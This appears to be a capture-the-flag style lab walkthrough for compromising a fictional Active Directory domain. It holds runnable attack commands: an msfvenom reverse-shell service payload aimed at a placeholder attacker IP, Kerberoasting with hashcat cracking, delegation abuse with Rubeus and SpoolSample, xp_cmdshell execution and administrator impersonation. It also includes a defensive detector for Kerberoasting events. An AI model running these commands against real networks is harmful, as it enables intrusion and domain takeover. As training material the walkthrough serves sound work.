## 0. Starting Point

The context of this lab is that you have been hired by a company to exploit any vulnerability in their Active Directory infrastructure in order to become Domain Admin. To do so, the company has provided local account credentials for the machine "Krillin".

You can use Remote Desktop to log in to the machine as `.\auditor` with the password "PassW0rd".

Furthermore, the folder `C:\Tools` contains most of the tools you need to exploit the vulnerabilities in the lab.

## 1. Vulnerable service

1. Enumerate services whose binaries can be modified by the current user:

   ```powershell
   .\SharpUp.exe audit ModifiableServiceBinaries
   ```

2. Because any local user has full control over the VulnService folder and the service is stopped, the binary in `C:\Program Files\Vulnerable Service\` can be replaced with the one created with msfvenom:

   ```shell
   msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<PORT> -f exe-service -o Service.exe
   ```

3. Then restart the machine; you should receive a reverse shell as `capsulecorp\vuln_svc`, which grants access to the domain:

   ```powershell
   shutdown /r /t 0
   ```

## 2. Unconstrained delegation

As the user `capsulecorp\vuln_svc`, perform the following steps.

1. Check whether any machine is configured for unconstrained delegation. The output should be the machine "RADITZ$":

   ```powershell
   Import-Module C:\Tools\PowerView.ps1
   # Get-ADComputer comes from the ActiveDirectory (RSAT) module. Primary group 515
   # (Domain Computers) excludes domain controllers, which are always trusted for delegation.
   Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
   ```

2. In order to get access to the machine, we need to perform Kerberoasting:

   ```powershell
   Import-Module C:\Tools\Invoke-Kerberoast.ps1
   Invoke-Kerberoast -OutputFormat Hashcat | % { $_.Hash } | Out-File -Encoding ASCII kerberoast_hashes.txt
   ```

3. Crack the obtained tickets:

   ```shell
   hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
   ```

4. Now you can access the RADITZ machine through RDP.

5. Obtain the TGT of Goku (the DC) using Rubeus. Run the monitor in one terminal and SpoolSample in another; after SpoolSample has run, the DC's TGT appears in the monitor output:

   ```powershell
   # In one terminal
   .\Rubeus.exe monitor /interval:10 /nowrap

   # In another terminal
   .\SpoolSample.exe goku raditz

   # These commands DO NOT WORK :/
   certutil.exe -urlcache -f http://raditz.capsulecorp.local
   Invoke-WebRequest http://raditz.capsulecorp.local -UseDefaultCredentials -UseBasicParsing
   ```
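
As an added defensive counterpart to the Kerberoast step above (this is not part of the original writeup), the following Python flags, from Windows Security event 4769 fields, the RC4 service-ticket requests that hashcat mode 13100 depends on; the event records, account names and IP addresses are constructed sample data.

```python
"""Flag Kerberoast-style service-ticket requests in Windows Security event 4769 records."""
from collections import defaultdict

RC4_HMAC = "0x17"   # etype 23, the ticket type hashcat mode 13100 cracks
SUCCESS = "0x0"

# Constructed sample events carrying the relevant 4769 fields; not real telemetry.
SAMPLE_4769 = [
    {"AccountName": "vuln_svc@CAPSULECORP.LOCAL", "ServiceName": "sql_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.20", "Status": "0x0"},
    {"AccountName": "vuln_svc@CAPSULECORP.LOCAL", "ServiceName": "http_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.20", "Status": "0x0"},
    {"AccountName": "vuln_svc@CAPSULECORP.LOCAL", "ServiceName": "backup_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.20", "Status": "0x0"},
    # Records that must not fire: AES ticket, machine-account SPN,
    # krbtgt (a TGT, not a service ticket) and a failed request.
    {"AccountName": "analyst1@CAPSULECORP.LOCAL", "ServiceName": "sql_svc",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.31", "Status": "0x0"},
    {"AccountName": "vuln_svc@CAPSULECORP.LOCAL", "ServiceName": "GOHAN$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.20", "Status": "0x0"},
    {"AccountName": "vuln_svc@CAPSULECORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.20", "Status": "0x0"},
    {"AccountName": "analyst2@CAPSULECORP.LOCAL", "ServiceName": "sql_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.40", "Status": "0x1b"},
]


def is_roastable_tgs(ev):
    """True for a successful RC4 service-ticket request to a non-machine, non-krbtgt SPN."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and ev["Status"] == SUCCESS
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def kerberoast_suspects(events, min_services=2):
    """Group roastable requests by (account, source IP) and report requesters that hit
    at least `min_services` distinct SPNs: Invoke-Kerberoast sends one RC4 TGS-REQ per
    SPN account in the domain, whereas a single legacy client asks for one service."""
    seen = defaultdict(set)
    for ev in filter(is_roastable_tgs, events):
        seen[(ev["AccountName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {key: sorted(spns) for key, spns in seen.items() if len(spns) >= min_services}


if __name__ == "__main__":
    for (acct, ip), spns in kerberoast_suspects(SAMPLE_4769).items():
        print(f"ALERT {acct} from {ip} requested RC4 service tickets for {spns}")
```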

## 3. Constrained delegation

1. The user `capsulecorp\vuln_svc` has access to an MSSQL instance. To check this, import PowerUpSQL and run the following command:

   ```powershell
   Import-Module C:\Tools\PowerUpSQL.ps1
   Get-SQLInstanceDomain
   ```

2. Obtain code execution on the machine through MSSQL:

   ```powershell
   Import-Module C:\Tools\PowerUpSQL.ps1
   Get-SQLQuery -Instance "gohan.capsulecorp.local,1433" -Query "select @@servername"
   Get-SQLQuery -Instance "gohan.capsulecorp.local,1433" -Query "EXEC master.dbo.xp_cmdshell 'whoami';"

   # Enabling xp_cmdshell is not necessary because it is already enabled by default
   # Get-SQLQuery -Instance "gohan.capsulecorp.local,1433" -Query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
   ```

3. Once you have a proper reverse shell, extract the sql_svc account's TGT (its krbtgt ticket) using Rubeus. To do so, you will have to transfer the file to the machine:

   ```powershell
   .\Rubeus.exe tgtdeleg /nowrap
   ```

4. Impersonate the user:

   ```powershell
   .\Rubeus.exe s4u /impersonateuser:administrator /domain:capsulecorp.local /msdsspn:cifs/goku.capsulecorp.local /dc:goku.capsulecorp.local /nowrap /ptt /ticket:<DUMPED_TICKET>
   ```

5. Check that you have access to the share `GOKU$\C$`:

   ```powershell
   dir \\goku.capsulecorp.local\c$
   ```